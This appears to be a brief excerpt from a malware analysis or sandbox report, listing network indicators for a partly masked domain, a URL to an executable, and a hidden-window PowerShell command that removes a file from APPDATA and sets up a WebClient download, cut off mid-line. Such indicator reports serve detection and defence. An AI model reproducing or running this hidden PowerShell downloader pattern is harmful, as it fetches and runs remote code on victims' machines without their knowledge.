Technical Information
- 'em####controls.com':80
- 'em####controls.com':443
- http://em####controls.com/med/wyter.exe
- 'em####controls.com':443
- DNS ASK em####controls.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\40dw.exe') {Remove-Item $env:APPDATA + '\40dw.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'US...' (with hidden window)